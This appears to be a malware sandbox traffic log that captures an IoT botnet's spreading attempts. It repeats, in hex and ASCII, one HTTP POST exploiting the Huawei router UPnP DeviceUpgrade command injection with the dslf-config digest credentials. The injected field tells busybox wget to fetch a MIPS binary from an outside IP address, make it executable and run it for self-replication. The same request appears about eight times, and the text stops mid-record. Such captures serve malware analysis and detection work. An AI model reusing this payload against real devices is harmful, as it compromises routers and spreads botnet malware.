70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 